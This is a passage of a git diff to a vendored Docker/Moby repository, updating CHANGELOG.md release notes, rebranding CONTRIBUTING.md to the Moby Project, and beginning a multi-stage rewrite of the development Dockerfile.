+- Fix unnescessary re-deploying of tasks when environment-variables are used [#32364](https://github.com/docker/docker/pull/32364)
+- Fix `docker stack deploy` not supporting `endpoint_mode` when deploying from a docker compose file  [#32333](https://github.com/docker/docker/pull/32333)
+- Proceed with startup if cluster component cannot be created to allow recovering from a broken swarm setup [#31631](https://github.com/docker/docker/pull/31631)
+
+### Security
+
+* Allow setting SELinux type or MCS labels when using `--ipc=container:` or `--ipc=host` [#30652](https://github.com/docker/docker/pull/30652)
+
+
+### Deprecation
+
+- Deprecate `--api-enable-cors` daemon flag. This flag was marked deprecated in Docker 1.6.0 but not listed in deprecated features [#32352](https://github.com/docker/docker/pull/32352)
+- Remove Ubuntu 12.04 (Precise Pangolin) as supported platform. Ubuntu 12.04 is EOL, and no longer receives updates [#32520](https://github.com/docker/docker/pull/32520)
+
+## 17.04.0-ce (2017-04-05)
+
+### Builder
+
+* Disable container logging for build containers [#29552](https://github.com/docker/docker/pull/29552)
+* Fix use of `**/` in `.dockerignore` [#29043](https://github.com/docker/docker/pull/29043)
+
+### Client
+
++ Sort `docker stack ls` by name [#31085](https://github.com/docker/docker/pull/31085)
++ Flags for specifying bind mount consistency [#31047](https://github.com/docker/docker/pull/31047)
+* Output of docker CLI --help is now wrapped to the terminal width [#28751](https://github.com/docker/docker/pull/28751)
+* Suppress image digest in docker ps [#30848](https://github.com/docker/docker/pull/30848)
+* Hide command options that are related to Windows [#30788](https://github.com/docker/docker/pull/30788)
+* Fix `docker plugin install` prompt to accept "enter" for the "N" default [#30769](https://github.com/docker/docker/pull/30769)
++ Add `truncate` function for Go templates [#30484](https://github.com/docker/docker/pull/30484)
+* Support expanded syntax of ports in `stack deploy` [#30476](https://github.com/docker/docker/pull/30476)
+* Support expanded syntax of mounts in `stack deploy` [#30597](https://github.com/docker/docker/pull/30597) [#31795](https://github.com/docker/docker/pull/31795)
++ Add `--add-host` for docker build [#30383](https://github.com/docker/docker/pull/30383)
++ Add `.CreatedAt` placeholder for `docker network ls --format` [#29900](https://github.com/docker/docker/pull/29900)
+* Update order of `--secret-rm` and `--secret-add` [#29802](https://github.com/docker/docker/pull/29802)
++ Add `--filter enabled=true` for `docker plugin ls` [#28627](https://github.com/docker/docker/pull/28627)
++ Add `--format` to `docker service ls` [#28199](https://github.com/docker/docker/pull/28199)
++ Add `publish` and `expose` filter for `docker ps --filter` [#27557](https://github.com/docker/docker/pull/27557)
+* Support multiple service IDs on `docker service ps` [#25234](https://github.com/docker/docker/pull/25234)
++ Allow swarm join with `--availability=drain` [#24993](https://github.com/docker/docker/pull/24993)
+* Docker inspect now shows "docker-default" when AppArmor is enabled and no other profile was defined [#27083](https://github.com/docker/docker/pull/27083)
+
+### Logging
+
++ Implement optional ring buffer for container logs [#28762](https://github.com/docker/docker/pull/28762)
++ Add `--log-opt awslogs-create-group=<true|false>` for awslogs (CloudWatch) to support creation of log groups as needed [#29504](https://github.com/docker/docker/pull/29504)
+- Fix segfault when using the gcplogs logging driver with a "static" binary [#29478](https://github.com/docker/docker/pull/29478)
+
+
+### Networking
+
+* Check parameter `--ip`, `--ip6` and `--link-local-ip` in `docker network connect` [#30807](https://github.com/docker/docker/pull/30807)
++ Added support for `dns-search` [#30117](https://github.com/docker/docker/pull/30117)
++ Added --verbose option for docker network inspect to show task details from all swarm nodes [#31710](https://github.com/docker/docker/pull/31710)
+* Clear stale datapath encryption states when joining the cluster [docker/libnetwork#1354](https://github.com/docker/libnetwork/pull/1354)
++ Ensure iptables initialization only happens once [docker/libnetwork#1676](https://github.com/docker/libnetwork/pull/1676)
+* Fix bad order of iptables filter rules [docker/libnetwork#961](https://github.com/docker/libnetwork/pull/961)
++ Add anonymous container alias to service record on attachable network [docker/libnetwork#1651](https://github.com/docker/libnetwork/pull/1651)
++ Support for `com.docker.network.container_interface_prefix` driver label [docker/libnetwork#1667](https://github.com/docker/libnetwork/pull/1667)
++ Improve network list performance by omitting network details that are not used [#30673](https://github.com/docker/docker/pull/30673)
+
+### Runtime
+
+* Handle paused container when restoring without live-restore set [#31704](https://github.com/docker/docker/pull/31704)
+- Do not allow sub second in healthcheck options in Dockerfile [#31177](https://github.com/docker/docker/pull/31177)
+* Support name and id prefix in  `secret update` [#30856](https://github.com/docker/docker/pull/30856)
+* Use binary frame for websocket attach endpoint [#30460](https://github.com/docker/docker/pull/30460)
+* Fix linux mount calls not applying propagation type changes [#30416](https://github.com/docker/docker/pull/30416)
+* Fix ExecIds leak on failed `exec -i` [#30340](https://github.com/docker/docker/pull/30340)
+* Prune named but untagged images if `danglingOnly=true` [#30330](https://github.com/docker/docker/pull/30330)
++ Add daemon flag to set `no_new_priv` as default for unprivileged containers [#29984](https://github.com/docker/docker/pull/29984)
++ Add daemon option `--default-shm-size` [#29692](https://github.com/docker/docker/pull/29692)
++ Support registry mirror config reload [#29650](https://github.com/docker/docker/pull/29650)
+- Ignore the daemon log config when building images [#29552](https://github.com/docker/docker/pull/29552)
+* Move secret name or ID prefix resolving from client to daemon [#29218](https://github.com/docker/docker/pull/29218)
++ Allow adding rules to `cgroup devices.allow` on container create/run [#22563](https://github.com/docker/docker/pull/22563)
+- Fix `cpu.cfs_quota_us` being reset when running `systemd daemon-reload` [#31736](https://github.com/docker/docker/pull/31736)
+
+### Swarm Mode
+
++ Topology-aware scheduling [#30725](https://github.com/docker/docker/pull/30725)
++ Automatic service rollback on failure [#31108](https://github.com/docker/docker/pull/31108)
++ Worker and manager on the same node are now connected through a UNIX socket [docker/swarmkit#1828](https://github.com/docker/swarmkit/pull/1828), [docker/swarmkit#1850](https://github.com/docker/swarmkit/pull/1850), [docker/swarmkit#1851](https://github.com/docker/swarmkit/pull/1851)
+* Improve raft transport package [docker/swarmkit#1748](https://github.com/docker/swarmkit/pull/1748)
+* No automatic manager shutdown on demotion/removal [docker/swarmkit#1829](https://github.com/docker/swarmkit/pull/1829)
+* Use TransferLeadership to make leader demotion safer [docker/swarmkit#1939](https://github.com/docker/swarmkit/pull/1939)
+* Decrease default monitoring period [docker/swarmkit#1967](https://github.com/docker/swarmkit/pull/1967)
++ Add Service logs formatting [#31672](https://github.com/docker/docker/pull/31672)
+* Fix service logs API to be able to specify stream [#31313](https://github.com/docker/docker/pull/31313)
++ Add `--stop-signal` for `service create` and `service update` [#30754](https://github.com/docker/docker/pull/30754)
++ Add `--read-only` for `service create` and `service update` [#30162](https://github.com/docker/docker/pull/30162)
++ Renew the context after communicating with the registry [#31586](https://github.com/docker/docker/pull/31586)
++ (experimental) Add `--tail` and `--since` options to `docker service logs` [#31500](https://github.com/docker/docker/pull/31500)
++ (experimental) Add `--no-task-ids` and `--no-trunc` options to `docker service logs` [#31672](https://github.com/docker/docker/pull/31672)
+
+### Windows
+
+* Block pulling Windows images on non-Windows daemons [#29001](https://github.com/docker/docker/pull/29001)
+
+## 17.03.1-ce (2017-03-27)
+
+### Remote API (v1.27) & Client
+
+* Fix autoremove on older api [#31692](https://github.com/docker/docker/pull/31692)
+* Fix default network customization for a stack [#31258](https://github.com/docker/docker/pull/31258/)
+* Correct CPU usage calculation in presence of offline CPUs and newer Linux [#31802](https://github.com/docker/docker/pull/31802)
+* Fix issue where service healthcheck is `{}` in remote API [#30197](https://github.com/docker/docker/pull/30197)
+
+### Runtime
+
+* Update runc to 54296cf40ad8143b62dbcaa1d90e520a2136ddfe [#31666](https://github.com/docker/docker/pull/31666)
+ * Ignore cgroup2 mountpoints [opencontainers/runc#1266](https://github.com/opencontainers/runc/pull/1266)
+* Update containerd to 4ab9917febca54791c5f071a9d1f404867857fcc [#31662](https://github.com/docker/docker/pull/31662) [#31852](https://github.com/docker/docker/pull/31852)
+ * Register healthcheck service before calling restore() [docker/containerd#609](https://github.com/docker/containerd/pull/609)
+* Fix `docker exec` not working after unattended upgrades that reload apparmor profiles [#31773](https://github.com/docker/docker/pull/31773)
+* Fix unmounting layer without merge dir with Overlay2 [#31069](https://github.com/docker/docker/pull/31069)
+* Do not ignore "volume in use" errors when force-delete [#31450](https://github.com/docker/docker/pull/31450)
+
+### Swarm Mode
+
+* Update swarmkit to 17756457ad6dc4d8a639a1f0b7a85d1b65a617bb [#31807](https://github.com/docker/docker/pull/31807)
+ * Scheduler now correctly considers tasks which have been assigned to a node but aren't yet running [docker/swarmkit#1980](https://github.com/docker/swarmkit/pull/1980)
+ * Allow removal of a network when only dead tasks reference it [docker/swarmkit#2018](https://github.com/docker/swarmkit/pull/2018)
+ * Retry failed network allocations less aggressively [docker/swarmkit#2021](https://github.com/docker/swarmkit/pull/2021)
+ * Avoid network allocation for tasks that are no longer running [docker/swarmkit#2017](https://github.com/docker/swarmkit/pull/2017)
+ * Bookkeeping fixes inside network allocator allocator [docker/swarmkit#2019](https://github.com/docker/swarmkit/pull/2019) [docker/swarmkit#2020](https://github.com/docker/swarmkit/pull/2020)
+
+### Windows
+
+* Cleanup HCS on restore [#31503](https://github.com/docker/docker/pull/31503)
+
+## 17.03.0-ce (2017-03-01)
+
+**IMPORTANT**: Starting with this release, Docker is on a monthly release cycle and uses a
+new YY.MM versioning scheme to reflect this. Two channels are available: monthly and quarterly.
+Any given monthly release will only receive security and bugfixes until the next monthly
+release is available. Quarterly releases receive security and bugfixes for 4 months after
+initial release. This release includes bugfixes for 1.13.1 but
+there are no major feature additions and the API version stays the same.
+Upgrading from Docker 1.13.1 to 17.03.0 is expected to be simple and low-risk.
+
+### Client
+
+* Fix panic in `docker stats --format` [#30776](https://github.com/docker/docker/pull/30776)
+
+### Contrib
+
+* Update various `bash` and `zsh` completion scripts [#30823](https://github.com/docker/docker/pull/30823), [#30945](https://github.com/docker/docker/pull/30945) and more...
+* Block obsolete socket families in default seccomp profile - mitigates unpatched kernels' CVE-2017-6074 [#29076](https://github.com/docker/docker/pull/29076)
+
+### Networking
+
+* Fix bug on overlay encryption keys rotation in cross-datacenter swarm [#30727](https://github.com/docker/docker/pull/30727)
+* Fix side effect panic in overlay encryption and network control plane communication failure ("No installed keys could decrypt the message") on frequent swarm leader re-election [#25608](https://github.com/docker/docker/pull/25608)
+* Several fixes around system responsiveness and datapath programming when using overlay network with external kv-store [docker/libnetwork#1639](https://github.com/docker/libnetwork/pull/1639), [docker/libnetwork#1632](https://github.com/docker/libnetwork/pull/1632) and more...
+* Discard incoming plain vxlan packets for encrypted overlay network [#31170](https://github.com/docker/docker/pull/31170)
+* Release the network attachment on allocation failure [#31073](https://github.com/docker/docker/pull/31073)
+* Fix port allocation when multiple published ports map to the same target port [docker/swarmkit#1835](https://github.com/docker/swarmkit/pull/1835)
+
+### Runtime
+
+* Fix a deadlock in docker logs [#30223](https://github.com/docker/docker/pull/30223)
+* Fix cpu spin waiting for log write events [#31070](https://github.com/docker/docker/pull/31070)
+* Fix a possible crash when using journald [#31231](https://github.com/docker/docker/pull/31231) [#31263](https://github.com/docker/docker/pull/31263)
+* Fix a panic on close of nil channel [#31274](https://github.com/docker/docker/pull/31274)
+* Fix duplicate mount point for `--volumes-from` in `docker run` [#29563](https://github.com/docker/docker/pull/29563)
+* Fix `--cache-from` does not cache last step [#31189](https://github.com/docker/docker/pull/31189)
+
+### Swarm Mode
+
+* Shutdown leaks an error when the container was never started [#31279](https://github.com/docker/docker/pull/31279)
+* Fix possibility of tasks getting stuck in the "NEW" state during a leader failover [docker/swarmkit#1938](https://github.com/docker/swarmkit/pull/1938)
+* Fix extraneous task creations for global services that led to confusing replica counts in `docker service ls` [docker/swarmkit#1957](https://github.com/docker/swarmkit/pull/1957)
+* Fix problem that made rolling updates slow when `task-history-limit` was set to 1 [docker/swarmkit#1948](https://github.com/docker/swarmkit/pull/1948)
+* Restart tasks elsewhere, if appropriate, when they are shut down as a result of nodes no longer satisfying constraints [docker/swarmkit#1958](https://github.com/docker/swarmkit/pull/1958)
+* (experimental)
+
 ## 1.13.1 (2017-02-08)
 
 **IMPORTANT**: On Linux distributions where `devicemapper` was the default storage driver,
@@ -274,7 +545,7 @@ To manually remove all plugins and resolve this problem, take the following step
 - Fix selinux labeling of volumes shared in a container [#23024](https://github.com/docker/docker/pull/23024)
 - Prohibit `/sys/firmware/**` from being accessed with apparmor [#26618](https://github.com/docker/docker/pull/26618)
 
-### DEPRECATION
+### Deprecation
 
 - Marked the `docker daemon` command as deprecated. The daemon is moved to a separate binary (`dockerd`), and should be used instead [#26834](https://github.com/docker/docker/pull/26834)
 - Deprecate unversioned API endpoints [#28208](https://github.com/docker/docker/pull/28208)
@@ -838,12 +1109,12 @@ installing docker, please make sure to update them accordingly.
 + Add security options to `docker info` output [#21172](https://github.com/docker/docker/pull/21172) [#23520](https://github.com/docker/docker/pull/23520)
 + Add insecure registries to `docker info` output [#20410](https://github.com/docker/docker/pull/20410)
 + Extend Docker authorization with TLS user information [#21556](https://github.com/docker/docker/pull/21556)
-+ devicemapper: expose Mininum Thin Pool Free Space through `docker info` [#21945](https://github.com/docker/docker/pull/21945)
++ devicemapper: expose Minimum Thin Pool Free Space through `docker info` [#21945](https://github.com/docker/docker/pull/21945)
 * API now returns a JSON object when an error occurs making it more consistent [#22880](https://github.com/docker/docker/pull/22880)
 - Prevent `docker run -i --restart` from hanging on exit [#22777](https://github.com/docker/docker/pull/22777)
 - Fix API/CLI discrepancy on hostname validation [#21641](https://github.com/docker/docker/pull/21641)
 - Fix discrepancy in the format of sizes in `stats` from HumanSize to BytesSize [#21773](https://github.com/docker/docker/pull/21773)
-- authz: when request is denied return forbbiden exit code (403) [#22448](https://github.com/docker/docker/pull/22448)
+- authz: when request is denied return forbidden exit code (403) [#22448](https://github.com/docker/docker/pull/22448)
 - Windows: fix tty-related displaying issues [#23878](https://github.com/docker/docker/pull/23878)
 
 ### Runtime
@@ -897,7 +1168,8 @@ installing docker, please make sure to update them accordingly.
 - Windows: Enable auto-creation of host-path to match Linux [#22094](https://github.com/docker/docker/pull/22094)
 
 
-### DEPRECATION
+### Deprecation
+
 * Environment variables `DOCKER_CONTENT_TRUST_OFFLINE_PASSPHRASE` and `DOCKER_CONTENT_TRUST_TAGGING_PASSPHRASE` have been renamed
   to `DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE` and `DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE` respectively [#22574](https://github.com/docker/docker/pull/22574)
 * Remove deprecated `syslog-tag`, `gelf-tag`, `fluentd-tag` log option in favor of the more generic `tag` one [#22620](https://github.com/docker/docker/pull/22620)
@@ -1434,7 +1706,7 @@ that allows to add build-time environment variables (#15182)
 
 - devicemapper: Implement deferred deletion capability (#16381)
 
-## Networking
+### Networking
 
 + `docker network` exits experimental and is part of standard release (#16645)
 + New network top-level concept, with associated subcommands and API (#16645)
@@ -1637,7 +1909,7 @@ by another client (#15489)
 
 #### Remote API
 
-- Fix unmarshalling of Command and Entrypoint
+- Fix unmarshaling of Command and Entrypoint
 - Set limit for minimum client version supported
 - Validate port specification
 - Return proper errors when attach/reattach fail
@@ -2034,7 +2306,7 @@ by another client (#15489)
 - Use mock for search tests.
 - Update to double-dash everywhere.
 - Move .dockerenv parsing to lxc driver.
-- Move all bind-mounts in the container inside the namespace.
+- Move all bind mounts in the container inside the namespace.
 - Don't use separate bind mount for container.
 - Always symlink /dev/ptmx for libcontainer.
 - Don't kill by pid for other drivers.
@@ -2322,7 +2594,7 @@ With the ongoing changes to the networking and execution subsystems of docker te
 - Fix ADD caching issue with . prefixed path
 - Fix docker build on devicemapper by reverting sparse file tar option
 - Fix issue with file caching and prevent wrong cache hit
-* Use same error handling while unmarshalling CMD and ENTRYPOINT
+* Use same error handling while unmarshaling CMD and ENTRYPOINT
 
 #### Documentation
 
@@ -2469,7 +2741,7 @@ With the ongoing changes to the networking and execution subsystems of docker te
 + Implement `docker log -f` to stream logs
 + Add env variable to disable kernel version warning
 + Add -format to `docker inspect`
-+ Support bind-mount for files
++ Support bind mount for files
 - Fix bridge creation on RHEL
 - Fix image size calculation
 - Make sure iptables are called even if the bridge already exists
diff --git a/vendor/github.com/docker/docker/CONTRIBUTING.md b/vendor/github.com/docker/docker/CONTRIBUTING.md
index eb5f8ab0e9..daefdadaed 100644
--- a/vendor/github.com/docker/docker/CONTRIBUTING.md
+++ b/vendor/github.com/docker/docker/CONTRIBUTING.md
@@ -1,14 +1,14 @@
-# Contributing to Docker
+# Contribute to the Moby Project
 
-Want to hack on Docker? Awesome!  We have a contributor's guide that explains
-[setting up a Docker development environment and the contribution
-process](https://docs.docker.com/opensource/project/who-written-for/). 
+Want to hack on the Moby Project? Awesome! We have a contributor's guide that explains
+[setting up a development environment and the contribution
+process](docs/contributing/). 
 
 [![Contributors guide](docs/static_files/contributors.png)](https://docs.docker.com/opensource/project/who-written-for/)
 
 This page contains information about reporting issues as well as some tips and
 guidelines useful to experienced open source contributors. Finally, make sure
-you read our [community guidelines](#docker-community-guidelines) before you
+you read our [community guidelines](#moby-community-guidelines) before you
 start participating.
 
 ## Topics
@@ -17,18 +17,18 @@ start participating.
 * [Design and Cleanup Proposals](#design-and-cleanup-proposals)
 * [Reporting Issues](#reporting-other-issues)
 * [Quick Contribution Tips and Guidelines](#quick-contribution-tips-and-guidelines)
-* [Community Guidelines](#docker-community-guidelines)
+* [Community Guidelines](#moby-community-guidelines)
 
 ## Reporting security issues
 
-The Docker maintainers take security seriously. If you discover a security
+The Moby maintainers take security seriously. If you discover a security
 issue, please bring it to their attention right away!
 
 Please **DO NOT** file a public issue, instead send your report privately to
 [security@docker.com](mailto:security@docker.com).
 
 Security reports are greatly appreciated and we will publicly thank you for it.
-We also like to send gifts&mdash;if you're into Docker schwag, make sure to let
+We also like to send gifts&mdash;if you're into schwag, make sure to let
 us know. We currently do not offer a paid security bounty program, but are not
 ruling it out in the future.
 
@@ -39,7 +39,7 @@ A great way to contribute to the project is to send a detailed report when you
 encounter an issue. We always appreciate a well-written, thorough bug report,
 and will thank you for it!
 
-Check that [our issue database](https://github.com/docker/docker/issues)
+Check that [our issue database](https://github.com/moby/moby/issues)
 doesn't already include that problem or suggestion before submitting an issue.
 If you find a match, you can use the "subscribe" button to get notified on
 updates. Do *not* leave random "+1" or "I have this too" comments, as they
@@ -66,7 +66,7 @@ This section gives the experienced contributor some tips and guidelines.
 
 Not sure if that typo is worth a pull request? Found a bug and know how to fix
 it? Do it! We will appreciate it. Any significant improvement should be
-documented as [a GitHub issue](https://github.com/docker/docker/issues) before
+documented as [a GitHub issue](https://github.com/moby/moby/issues) before
 anybody starts working on it.
 
 We are always thrilled to receive pull requests. We do our best to process them
@@ -83,11 +83,7 @@ contributions, see [the advanced contribution
 section](https://docs.docker.com/opensource/workflow/advanced-contributing/) in
 the contributors guide.
 
-We try hard to keep Docker lean and focused. Docker can't do everything for
-everybody. This means that we might decide against incorporating a new feature.
-However, there might be a way to implement that feature *on top of* Docker.
-
-### Talking to other Docker users and contributors
+### Connect with other Moby Project contributors
 
 <table class="tg">
   <col width="45%">
@@ -96,52 +92,29 @@ However, there might be a way to implement that feature *on top of* Docker.
     <td>Forums</td>
     <td>
       A public forum for users to discuss questions and explore current design patterns and
-      best practices about Docker and related projects in the Docker Ecosystem. To participate,
-      just log in with your Docker Hub account on <a href="https://forums.docker.com" target="_blank">https://forums.docker.com</a>.
+      best practices about all the Moby projects. To participate, log in with your Github
+      account or create an account at <a href="https://forums.mobyproject.org" target="_blank">https://forums.mobyproject.org</a>.
     </td>
   </tr>
   <tr>
-    <td>Internet&nbsp;Relay&nbsp;Chat&nbsp;(IRC)</td>
+    <td>Slack</td>
     <td>
       <p>
-        IRC a direct line to our most knowledgeable Docker users; we have
-        both the  <code>#docker</code> and <code>#docker-dev</code> group on
-        <strong>irc.freenode.net</strong>.
-        IRC is a rich chat protocol but it can overwhelm new users. You can search
-        <a href="https://botbot.me/freenode/docker/#" target="_blank">our chat archives</a>.
-      </p>
-      <p>
-        Read our <a href="https://docs.docker.com/opensource/get-help/#irc-quickstart" target="_blank">IRC quickstart guide</a>
-        for an easy way to get started.
+        Register for the Docker Community Slack at
+	<a href="https://community.docker.com/registrations/groups/4316" target="_blank">https://community.docker.com/registrations/groups/4316</a>.
+        We use the #moby-project channel for general discussion, and there are separate channels for other Moby projects such as #containerd.
+	Archives are available at <a href="https://dockercommunity.slackarchive.io/" target="_blank">https://dockercommunity.slackarchive.io/</a>.
       </p>
     </td>
   </tr>
-  <tr>
-    <td>Google Group</td>
-    <td>
-      The <a href="https://groups.google.com/forum/#!forum/docker-dev" target="_blank">docker-dev</a>
-      group is for contributors and other people contributing to the Docker project.
-      You can join them without a google account by sending an email to 
-      <a href="mailto:docker-dev+subscribe@googlegroups.com">docker-dev+subscribe@googlegroups.com</a>.
-      After receiving the join-request message, you can simply reply to that to confirm the subscription.
-    </td>
-  </tr>
   <tr>
     <td>Twitter</td>
     <td>
-      You can follow <a href="https://twitter.com/docker/" target="_blank">Docker's Twitter feed</a>
+      You can follow <a href="https://twitter.com/moby/" target="_blank">Moby Project Twitter feed</a>
       to get updates on our products. You can also tweet us questions or just
       share blogs or stories.
     </td>
   </tr>
-  <tr>
-    <td>Stack Overflow</td>
-    <td>
-      Stack Overflow has over 17000 Docker questions listed. We regularly
-      monitor <a href="https://stackoverflow.com/search?tab=newest&q=docker" target="_blank">Docker questions</a>
-      and so do many other knowledgeable Docker users.
-    </td>
-  </tr>
 </table>
 
 
@@ -155,10 +128,11 @@ Fork the repository and make changes on your fork in a feature branch:
 	your intentions, and name it XXXX-something where XXXX is the number of the
 	issue.
 
-Submit unit tests for your changes. Go has a great test framework built in; use
-it! Take a look at existing tests for inspiration. [Run the full test
-suite](https://docs.docker.com/opensource/project/test-and-docs/) on your branch before
-submitting a pull request.
+Submit tests for your changes. See [TESTING.md](./TESTING.md) for details.
+
+If your changes need integration tests, write them against the API. The `cli`
+integration tests are slowly either migrated to API tests or moved away as unit
+tests in `docker/cli` and end-to-end tests for Docker.
 
 Update the documentation when creating or modifying features. Test your
 documentation changes for clarity, concision, and correctness, as well as a
@@ -173,10 +147,64 @@ committing your changes. Most editors have plug-ins that do this automatically.
 Pull request descriptions should be as clear as possible and include a reference
 to all the issues that they address.
 
+### Successful Changes
+
+Before contributing large or high impact changes, make the effort to coordinate
+with the maintainers of the project before submitting a pull request. This
+prevents you from doing extra work that may or may not be merged.
+
+Large PRs that are just submitted without any prior communication are unlikely
+to be successful.
+
+While pull requests are the methodology for submitting changes to code, changes
+are much more likely to be accepted if they are accompanied by additional
+engineering work. While we don't define this explicitly, most of these goals
+are accomplished through communication of the design goals and subsequent
+solutions. Often times, it helps to first state the problem before presenting
+solutions.
+
+Typically, the best methods of accomplishing this are to submit an issue,
+stating the problem. This issue can include a problem statement and a
+checklist with requirements. If solutions are proposed, alternatives should be
+listed and eliminated. Even if the criteria for elimination of a solution is
+frivolous, say so.
+
+Larger changes typically work best with design documents. These are focused on
+providing context to the design at the time the feature was conceived and can
+inform future documentation contributions.
+
+### Commit Messages
+
 Commit messages must start with a capitalized and short summary (max. 50 chars)
 written in the imperative, followed by an optional, more detailed explanatory
 text which is separated from the summary by an empty line.
 
+Commit messages should follow best practices, including explaining the context
+of the problem and how it was solved, including in caveats or follow up changes
+required. They should tell the story of the change and provide readers
+understanding of what led to it.
+
+If you're lost about what this even means, please see [How to Write a Git
+Commit Message](http://chris.beams.io/posts/git-commit/) for a start.
+
+In practice, the best approach to maintaining a nice commit message is to
+leverage a `git add -p` and `git commit --amend` to formulate a solid
+changeset. This allows one to piece together a change, as information becomes
+available.
+
+If you squash a series of commits, don't just submit that. Re-write the commit
+message, as if the series of commits was a single stroke of brilliance.
+
+That said, there is no requirement to have a single commit for a PR, as long as
+each commit tells the story. For example, if there is a feature that requires a
+package, it might make sense to have the package in a separate commit then have
+a subsequent commit that uses it.
+
+Remember, you're telling part of the story with the commit message. Don't make
+your chapter weird.
+
+### Review
+
 Code review comments may be added to your pull request. Discuss, then make the
 suggested modifications and push additional commits to your feature branch. Post
 a comment after pushing. New commits show up in the pull request automatically,
@@ -197,10 +225,9 @@ calling it in another file constitute a single logical unit of work. The very
 high majority of submissions should have a single commit, so if in doubt: squash
 down to one.
 
-After every commit, [make sure the test suite passes]
-(https://docs.docker.com/opensource/project/test-and-docs/). Include documentation
-changes in the same pull request so that a revert would remove all traces of
-the feature or fix.
+After every commit, [make sure the test suite passes](./TESTING.md). Include
+documentation changes in the same pull request so that a revert would remove
+all traces of the feature or fix.
 
 Include an issue reference like `Closes #XXXX` or `Fixes #XXXX` in commits that
 close an issue. Including references automatically closes the issue on a merge.
@@ -212,15 +239,11 @@ Please see the [Coding Style](#coding-style) for further guidelines.
 
 ### Merge approval
 
-Docker maintainers use LGTM (Looks Good To Me) in comments on the code review to
-indicate acceptance.
-
-A change requires LGTMs from an absolute majority of the maintainers of each
-component affected. For example, if a change affects `docs/` and `registry/`, it
-needs an absolute majority from the maintainers of `docs/` AND, separately, an
-absolute majority of the maintainers of `registry/`.
+Moby maintainers use LGTM (Looks Good To Me) in comments on the code review to
+indicate acceptance, or use the Github review approval feature.
 
-For more details, see the [MAINTAINERS](MAINTAINERS) page.
+For an explanation of the review and approval process see the
+[REVIEWING](project/REVIEWING.md) page.
 
 ### Sign your work
 
@@ -280,17 +303,46 @@ commit automatically with `git commit -s`.
 ### How can I become a maintainer?
 
 The procedures for adding new maintainers are explained in the 
-global [MAINTAINERS](https://github.com/docker/opensource/blob/master/MAINTAINERS)
-file in the [https://github.com/docker/opensource/](https://github.com/docker/opensource/)
-repository.
+[/project/GOVERNANCE.md](/project/GOVERNANCE.md)
+file in this repository.
 
 Don't forget: being a maintainer is a time investment. Make sure you
 will have time to make yourself available. You don't have to be a
 maintainer to make a difference on the project!
 
-## Docker community guidelines
+### Manage issues and pull requests using the Derek bot
+
+If you want to help label, assign, close or reopen issues or pull requests
+without commit rights, ask a maintainer to add your Github handle to the 
+`.DEREK.yml` file. [Derek](https://github.com/alexellis/derek) is a bot that extends
+Github's user permissions to help non-committers to manage issues and pull requests simply by commenting.
+
+For example:
+
+* Labels
+
+```
+Derek add label: kind/question
+Derek remove label: status/claimed
+```
 
-We want to keep the Docker community awesome, growing and collaborative. We need
+* Assign work
+
+```
+Derek assign: username
+Derek unassign: me
+```
+
+* Manage issues and PRs
+
+```
+Derek close
+Derek reopen
+```
+
+## Moby community guidelines
+
+We want to keep the Moby community awesome, growing and collaborative. We need
 your help to keep it that way. To help with this we've come up with some general
 guidelines for the community as a whole:
 
@@ -318,6 +370,11 @@ guidelines for the community as a whole:
   used to ping maintainers to review a pull request, a proposal or an
   issue.
 
+The open source governance for this repository is handled via the [Moby Technical Steering Committee (TSC)](https://github.com/moby/tsc)
+charter. For any concerns with the community process regarding technical contributions,
+please contact the TSC. More information on project governance is available in
+our [project/GOVERNANCE.md](/project/GOVERNANCE.md) document.
+
 ### Guideline violations — 3 strikes method
 
 The point of this section is not to find opportunities to punish people, but we
diff --git a/vendor/github.com/docker/docker/Dockerfile b/vendor/github.com/docker/docker/Dockerfile
index ce2d702807..38ca482a5a 100644
--- a/vendor/github.com/docker/docker/Dockerfile
+++ b/vendor/github.com/docker/docker/Dockerfile
@@ -2,164 +2,56 @@
 #
 # Usage:
 #
-# # Assemble the full dev environment. This is slow the first time.
-# docker build -t docker .
+# # Use make to build a development environment image and run it in a container.
+# # This is slow the first time.
+# make BIND_DIR=. shell
 #
-# # Mount your source in an interactive container for quick testing:
-# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash
+# The following commands are executed inside the running container.
+
+# # Make a dockerd binary.
+# # hack/make.sh binary
+#
+# # Install dockerd to /usr/local/bin
+# # make install
 #
-# # Run the test suite:
-# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py
+# # Run unit tests
+# # hack/test/unit
 #
-# # Publish a release:
-# docker run --privileged \
-#  -e AWS_S3_BUCKET=baz \
-#  -e AWS_ACCESS_KEY=foo \
-#  -e AWS_SECRET_KEY=bar \
-#  -e GPG_PASSPHRASE=gloubiboulga \
-#  docker hack/release.sh
+# # Run tests e.g. integration, py
+# # hack/make.sh binary test-integration test-docker-py
 #
 # Note: AppArmor used to mess with privileged mode, but this is no longer
 # the case. Therefore, you don't have to disable it anymore.
 #
 
-FROM debian:jessie
-
+FROM golang:1.10.3 AS base
+# FIXME(vdemeester) this is kept for other script depending on it to not fail right away
+# Remove this once the other scripts uses something else to detect the version
+ENV GO_VERSION 1.10.3
 # allow replacing httpredir or deb mirror
 ARG APT_MIRROR=deb.debian.org
 RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list
 
-# Add zfs ppa
-RUN apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys E871F18B51E0147C77796AC81196BA81F6B0FC61 \
-	|| apt-key adv --keyserver hkp://pgp.mit.edu:80 --recv-keys E871F18B51E0147C77796AC81196BA81F6B0FC61
-RUN echo deb http://ppa.launchpad.net/zfs-native/stable/ubuntu trusty main > /etc/apt/sources.list.d/zfs.list
-
-# Packaged dependencies
+FROM base AS criu
+# Install CRIU for checkpoint/restore support
+ENV CRIU_VERSION 3.6
+# Install dependancy packages specific to criu
 RUN apt-get update && apt-get install -y \
-	apparmor \
-	apt-utils \
-	aufs-tools \
-	automake \
-	bash-completion \
-	binutils-mingw-w64 \
-	bsdmainutils \
-	btrfs-tools \
-	build-essential \
-	clang \
-	cmake \
-	createrepo \
-	curl \
-	dpkg-sig \
-	gcc-mingw-w64 \
-	git \
-	iptables \
-	jq \
-	libapparmor-dev \
-	libcap-dev \
-	libltdl-dev \
-	libnl-3-dev \
+	libnet-dev \
 	libprotobuf-c0-dev \
 	libprotobuf-dev \
-	libsqlite3-dev \
-	libsystemd-journal-dev \
-	libtool \
-	mercurial \
-	net-tools \
-	pkg-config \
+	libnl-3-dev \
